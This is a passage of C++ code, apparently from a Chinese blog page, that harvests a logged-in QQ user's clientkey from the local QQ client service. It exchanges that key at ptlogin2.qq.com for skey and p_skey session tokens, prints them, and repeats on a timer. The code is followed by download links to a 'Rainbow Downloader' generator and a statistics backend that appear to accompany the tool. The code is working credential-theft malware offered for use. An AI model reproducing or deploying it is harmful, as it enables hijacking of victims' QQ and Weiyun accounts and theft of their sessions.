hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 添加头信息
char lpHeaders2[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders2, strlen(lpHeaders2), NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 读取整个Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
if (bRet)
{
// 提取 ClientKey 的值
char* clientkey = lpHeaderBuffer + dwSizeOfRq;
while (clientkey != lpHeaderBuffer)
{
if (strstr(clientkey, "clientkey="))
{
clientkey += sizeof("clientkey");
char* pEndBuffer = strstr(clientkey, ";");
*pEndBuffer = 0;
break;
}
clientkey--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] clientkey:" << clientkey << "\r\n" << endl;
/* 四次会话 */
// 构造 URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/jump?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&clientkey=");
strcat(lpszUrlPath, clientkey);
strcat(lpszUrlPath, "&keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40");
// 发送HTTPS请求
hHttpSession = InternetConnectA(hInternet, "ptlogin2.qq.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// 添加Referer
char lpReferer[128] = { 0 };
strcpy(lpReferer, "Referer: ");
strcat(lpReferer, "https://ptlogin2.qq.com/");
strcat(lpReferer, "\r\n");
HttpAddRequestHeaders(hHttpRequest, lpReferer, -1L, HTTP_ADDREQ_FLAG_ADD);
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 获取返回数据的大小
DWORD dwNumberOfBytesAvailablex = 0;
InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailablex, NULL, NULL);
// 读取返回的 Response 数据
char* lpBufferx = new char[dwNumberOfBytesAvailablex + 1]();
InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);
// 输出 Response 数据
cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;
// 从返回数据中提取 ptsigx 备用
char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;
while (ptsigx != lpBufferx)
{
if (strstr(ptsigx, "check_sig?"))
{
ptsigx += sizeof("check_sig");
char* pEndBuffer = strstr(ptsigx, "'");
*pEndBuffer = 0;
break;
}
ptsigx--;
}
// 构造 ptsigx URL
CString szPtsigx = "";
szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);
cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;
delete[] lpBufferx;
// 读取整个Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 skey 的值
char* skey = lpHeaderBuffer + dwSizeOfRq;
while (skey != lpHeaderBuffer)
{
if (strstr(skey, "skey="))
{
skey += sizeof("skey");
char* pEndBuffer = strstr(skey, ";");
*pEndBuffer = 0;
break;
}
skey--;
}
// 关闭句柄
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] Skey:" << skey << "\r\n" << endl;
/* 五次会话 */
char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);
szPtsigx.ReleaseBuffer();
// 发送HTTPS请求
hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// 查询HTTP请求状态
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// 读取整个Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 提取 p_skey 的值
char* pskey = lpHeaderBuffer + dwSizeOfRq;
while (pskey != lpHeaderBuffer)
{
if (strstr(pskey, "p_skey="))
{
pskey += sizeof("p_skey");
char* pEndBuffer = strstr(pskey, ";");
*pEndBuffer = 0;
break;
}
pskey--;
}
cout << "[+] P_skey:" << pskey << "\r\n" << endl;
// 延时 20 分钟
// 重新获取一遍
// 每个Clientkey
// 时效为 20 分钟
Sleep(1200000);
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
InternetCloseHandle(hHttpRequest);
}
InternetCloseHandle(hHttpSession);
}
InternetCloseHandle(hInternet);
}
}
// 延时两分钟
// 继续搜索QQ进程
Sleep(120000);
} while (1);
return 0;
}生成器下载
Rainbow Downloader 2023 Free v1.2 生成器下载【优快云】
Rainbow Downloader 2023 Free v1.2
https://download.youkuaiyun.com/download/qq_39190622/88374503
Rainbow Downloader 2023 Free v1.2 生成器下载【蓝奏云】
Rainbow Downloader 2023 Free v1.2https://wwrd.lanzoum.com/id0Bi19w53sj
Rainbow Downloader 2023 Free v1.2 生成器下载【百度云 提取码:aw77】
Rainbow Downloader 2023 Free v1.2https://pan.baidu.com/s/1Is3Eb0Ayk1dJn8zBIyGyyw
统计后台下载
Rainbow Counting System 2023 Free v1.1 统计系统下载【优快云】
Rainbow Counting System 2023 Free v1.1https://download.youkuaiyun.com/download/qq_39190622/88374513
Rainbow Counting System 2023 Free v1.1 统计系统下载【蓝奏云】
Rainbow Counting System 2023 Free v1.1https://wwrd.lanzoum.com/iwG4M19w45ob
Rainbow Counting System 2023 Free v1.1 统计系统下载【百度云 提取码:i1fd】
Rainbow Counting System 2023 Free v1.1https://pan.baidu.com/s/1-VZs1-PV8ElCcBSSmqz7zA
扫一扫
891
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
